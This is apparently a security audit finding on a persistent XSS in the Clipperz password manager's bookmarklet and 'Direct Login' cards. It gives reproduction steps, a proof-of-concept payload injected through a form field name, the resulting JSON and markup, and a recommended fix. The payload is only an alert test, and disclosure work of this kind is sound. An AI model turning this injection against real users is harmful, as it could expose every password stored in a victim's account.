70 lines
2.8 KiB
Plaintext
70 lines
2.8 KiB
Plaintext
CLP-01-014 Persistent XSS via Direct Login from Bookmarklet (Critical)
|
|
|
|
Caused by missing output filtering, an attacker can abuse the
|
|
Bookmarklet in combination with the creation of a new card of type
|
|
?Direct Login? to persistently infect a Clipperz account and get full
|
|
and transparent access to all data stored in the account including
|
|
passwords, keystrokes and other sensitive data.
|
|
|
|
Steps to Reproduce:
|
|
Navigate to a maliciously prepared Website
|
|
Use the Clipperz Bookmarklet
|
|
Copy the generated JSON to create a Card
|
|
Navigate to the Clipperz application
|
|
Create a new card of type ?Direct Login?
|
|
Paste the content and save (First XSS is triggerd)
|
|
Create the card (Second XSS is triggered)
|
|
|
|
Anytime the affected user navigates to the malicious card, the injected
|
|
JavaScript is executed. This thereby effectively ?trojanizes? the entire
|
|
Clipperz account and gives an attacker access to any of the stored cards
|
|
and related passwords in plaintext.
|
|
|
|
Example Markup for malicious page:
|
|
<body>
|
|
<form action=''>
|
|
<input name='username' type='text'>
|
|
<input name='password' type='password'>
|
|
<input name='"><img src=x onerror=alert(domain)>' value='bla'>
|
|
</form>
|
|
|
|
Resulting JSON:
|
|
{"page": {"title": ""},
|
|
"form": {"attributes": {"action": "http://attacked/",
|
|
"method": null},
|
|
"inputs": [{"type": "text",
|
|
"name": "username",
|
|
"value": "root"},
|
|
{"type": "password",
|
|
"name": "password",
|
|
"value": ""},
|
|
{"type": "text",
|
|
"name": "\"><img src=x onerror=alert(domain)>",
|
|
"value": "bla"}]},
|
|
"version": "0.2.3"}
|
|
|
|
Affected Markup in Clipperz application:
|
|
<tr id="elgen-1630"><td
|
|
class="directLoginBindingLabelTD"><span>"><img src=x
|
|
onerror=alert(domain)></span></td><td
|
|
class="directLoginBindingValueTD"><div style="display: none;"
|
|
id="Clipperz_PM_Components_Panels_editModeBox_3947"><select
|
|
id="Clipperz_PM_Components_Panels_select_3948"><option
|
|
value="null">---</option><option
|
|
value="014ab7a3d138834f883b0742857cd906fd1902e5c42303348fa181eb568695c1">username</option><option
|
|
value="8e63b43adc66c2efb1ad9b61aa0e7184f12545eeb163ce076cbae05d5d6e0a45">password</option><option
|
|
value="01a2b7d792deb70d98ad5f1bb0b3afd89de20554ba606be2662531c20dd6fd48"
|
|
selected="true">"><img src=x
|
|
onerror=alert(domain)></option></select></div><div style="display:
|
|
block;" id="Clipperz_PM_Components_Panels_viewModeBox_3949"><span
|
|
id="Clipperz_PM_Components_Panels_viewValue_3950">"><img src="x"
|
|
onerror="alert(domain)"></span></div></td></tr>
|
|
|
|
It is highly recommended to escape and filter any output and consider
|
|
the pages to pull login data from to be an adversary as well. Especially
|
|
the content of the name field and other attributes of form elements
|
|
should not be considered trusted as they can contain malicious data -
|
|
similar to the form element?s value. All special HTML characters need to
|
|
be converted into their corresponding HTML entities before displaying
|
|
them to the user.
|